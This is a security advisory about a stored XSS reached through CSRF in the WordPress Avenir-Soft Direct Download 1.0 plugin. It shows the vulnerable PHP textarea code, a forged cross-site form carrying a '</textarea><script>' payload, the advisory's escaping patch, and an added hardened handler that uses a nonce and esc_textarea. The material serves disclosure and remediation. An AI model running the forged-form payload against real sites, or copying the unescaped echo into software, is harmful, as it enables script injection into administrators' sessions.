WordPress Avenir-Soft Direct Download 1.0 XSS / CSRF

Published: 07 Aug 2015 00:00:00
Reported by: Mahdi.Hidden
Type: packetstorm
Source: packetstormsecurity.com

Wordpress Avenir-Soft Direct Download 1.0 XSS / CSRF exploit. The plugin's settings page (wp-admin/admin.php?page=avenir_plugin) saves the POSTed `style1` stylesheet body without any CSRF token and echoes the saved file back into a textarea without escaping, so a forged form submitted by a logged-in administrator stores a `</textarea><script>` payload that executes on every later visit to the settings page (stored XSS reached through CSRF).
Code
```
######################
# Exploit Title: Wordpress Avenir-Soft Direct Download Plug-in XSS/CSRF
# Exploit Author: Ashiyane Digital Security Team
# Vendor Homepage: https://wordpress.org/plugins/avenirsoft-directdownload/
# Date: 2015-08-06
# Tested On: Kali Linux - FireFox
# Software Link: https://downloads.wordpress.org/plugin/avenirsoft-directdownload.zip
# Version: 1.0
######################
# Vulnerable Code:
# The saved stylesheet is read back from $cssurl and echoed straight into the
# textarea; a stored "</textarea>" closes the element and what follows is
# rendered as HTML.

<form method="post" action="">
<textarea name="style1" class="style" rows="10" cols="20"><?php echo
file_get_contents($cssurl); ?>
</textarea>
<p>
<input type="submit" value="Save Changes" name="submitbutton">
</p>
</form>
######################
# Exploit:
# Cross-site form. The settings page checks no nonce, so an administrator who
# submits this from an attacker-controlled page stores the payload, which then
# runs on every visit to the settings page.

<form method="post"
action="http://[URL]/[Path]/wp-admin/admin.php?page=avenir_plugin">
<input type="hidden" name="style1"
value="</textarea><script>alert(/xss/)</script>">
<p>
<input type="submit" value="Save Changes" name="submitbutton">
</p>
</form>
######################
# Patch:
# htmlspecialchars() encodes the angle brackets, so stored content can no
# longer close the textarea.

<form method="post" action="">
<textarea name="style1" class="style" rows="10" cols="20"><?php echo
htmlspecialchars(file_get_contents($cssurl)); ?>
</textarea>
<p>
<input type="submit" value="Save Changes" name="submitbutton">
</p>
</form>
######################
# Discovered By: Mahdi.Hidden
######################
```
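The patch above escapes the stylesheet on output, which stops the `</textarea>` breakout, but the form it shows still carries no nonce, so the cross-site POST from the exploit section would still overwrite the stored stylesheet. The following hardened settings handler is an added example, not the plugin's own code and not part of the advisory, written in WordPress style to cover both halves of the report: a capability check, a nonce check on the POST, and escaping on output. The function name `avenir_example_render_settings_page`, the nonce action `avenir_example_save_style`, the nonce field name `avenir_example_nonce` and the file `avenir-example.css` are assumptions made for the example; it assumes it runs inside wp-admin, where the WordPress API functions it calls are loaded.

```php
<?php
/*
 * Added example (not the plugin's code, not from the advisory): a hardened
 * version of the settings page handler that addresses both findings.
 * Assumptions (labelled): runs inside wp-admin with the WordPress API loaded;
 * the stylesheet is stored at plugin_dir_path(__FILE__) . 'avenir-example.css'
 * (the original code reads it from $cssurl); all names below are invented.
 */

function avenir_example_render_settings_page() {
    // 1. Authorisation: only users allowed to manage options may reach the form.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    $css_path = plugin_dir_path( __FILE__ ) . 'avenir-example.css'; // assumed location

    if ( isset( $_POST['submitbutton'] ) ) {
        // 2. CSRF: refuse the POST unless it carries a nonce minted for this
        //    action for this user. check_admin_referer() calls wp_die() on
        //    failure, so the attacker's cross-site form never reaches the write.
        check_admin_referer( 'avenir_example_save_style', 'avenir_example_nonce' );

        // 3. Treat the body as an untrusted string; wp_unslash() removes the
        //    slashes WordPress adds to request data.
        $style = isset( $_POST['style1'] ) ? (string) wp_unslash( $_POST['style1'] ) : '';
        file_put_contents( $css_path, $style );
    }

    $current = file_exists( $css_path ) ? (string) file_get_contents( $css_path ) : '';
    ?>
    <form method="post" action="">
        <?php wp_nonce_field( 'avenir_example_save_style', 'avenir_example_nonce' ); ?>
        <textarea name="style1" class="style" rows="10" cols="20"><?php
            // 4. Output escaping: esc_textarea() is htmlspecialchars() with
            //    ENT_QUOTES and the blog charset, so a stored "</textarea>"
            //    becomes "&lt;/textarea&gt;" and cannot close the element.
            echo esc_textarea( $current );
        ?></textarea>
        <p><input type="submit" value="Save Changes" name="submitbutton"></p>
    </form>
    <?php
}
```

With the nonce in place, the forged form in the exploit section fails at `check_admin_referer()` before anything is written, and the escaping covers the case where a payload is already on disk from before the fix. Escaping alone, as in the page's patch, would still let a cross-site request silently replace the site's stylesheet.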
